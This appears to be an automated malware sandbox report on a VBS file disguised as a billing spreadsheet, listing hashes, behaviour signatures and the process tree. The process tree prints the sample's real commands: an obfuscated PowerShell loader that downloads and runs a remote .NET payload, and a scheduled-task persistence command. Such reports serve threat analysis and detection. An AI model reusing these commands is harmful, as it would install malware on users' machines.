Resubmissions
12/12/2023, 15:39
231212-s3zdzsfehm 10
12/12/2023, 15:32
231212-syk1ssfdgp 10
12/12/2023, 15:28
231212-swhgwshad3 10
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231025-en -
resource tags
arch:x64 arch:x86 image:win7-20231025-en locale:en-us os:windows7-x64 system -
submitted
12/12/2023, 15:28
Static task
static1
Behavioral task
behavioral1
Sample
Billed-report2023xls.vbs
Resource
win7-20231025-en
Behavioral task
behavioral2
Sample
Billed-report2023xls.vbs
Resource
win10v2004-20231130-en
General
-
Target
Billed-report2023xls.vbs
-
Size
135KB
-
MD5
81df0d95d784fd74d88174859e7ab470
-
SHA1
03aed26ac800ea6c492e64fb5fd5ab928b3564ee
-
SHA256
da59502967c26be14e52f229feb80beb4672ad5454eb943969f1da9a21815886
-
SHA512
4b76ec39584ab792f17dee8e435834ac50c3c9285fc30fee5a65b32ebf54fc3e918032caeb7f550f0d5d577faf45a8613ec040c6e318afcc0be1f7a47dbd4689
-
SSDEEP
3072:8DupClYAAAA/AAAA4AAAA4AAAA4AAAA4AAAA4AAAAFsx7YX2ojcAAAA4AAAA4AA3:3
Malware Config
Extracted
https://textbin.net/raw/ezjmofz3s6
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2904 powershell.exe 6 2904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2068 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2396 powershell.exe 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2164 2952 WScript.exe 28 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2068 2952 WScript.exe 30 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2952 wrote to memory of 2396 2952 WScript.exe 32 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 PID 2396 wrote to memory of 2904 2396 powershell.exe 34 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn mi /f2⤵PID:2164
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn mi /tr "C:\Users\Admin\AppData\Local\Temp\mi.vbs" /sc minute /mo mi2⤵
- Creates scheduled task(s)
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bu▒Hg▒d▒Bv▒Ho▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒B3▒G0▒Z▒B0▒H▒▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HY▒ZQBi▒Gg▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB0▒GU▒e▒B0▒GI▒aQBu▒C4▒bgBl▒HQ▒LwBy▒GE▒dw▒v▒GU▒egBq▒G0▒bwBm▒Ho▒MwBz▒DY▒Jw▒p▒C▒▒KQ▒g▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dgBl▒GI▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒TQBh▒HI▒YQBj▒GE▒aQBi▒G8▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒TQBz▒HE▒QgBJ▒GI▒WQ▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒d▒BU▒FM▒VQBY▒C8▒Z▒▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Hc▒bQBk▒HQ▒c▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒bgB4▒HQ▒bwB6▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs');powershell -command $KByHL;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$nxtoz = '034';$wmdtp = 'C:\Users\Admin\AppData\Local\Temp\Billed-report2023xls.vbs';[Byte[]] $nvebh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($nvebh).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/tTSUX/d/ee.etsap//:sptth' , $wmdtp , '____________________________________________-------', $nxtoz, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 a7e36bd71df2e0eae44b62ea1fb75df6
SHA1 2478b074b55dac09321add40b370477dd63daddf
SHA256 17e678eaad378c7fe60c0cfdacb9e19d2597a506eae5101aa7407f1fbba9c4d9
SHA512 ec70d2810b8db33e78f7cc226c4c44bfdfc4925b534e92965c028db275d108915f04a1d2de86dd905137d9fdda4e133ebf16d5b6b6f4e8904228f33993a4755f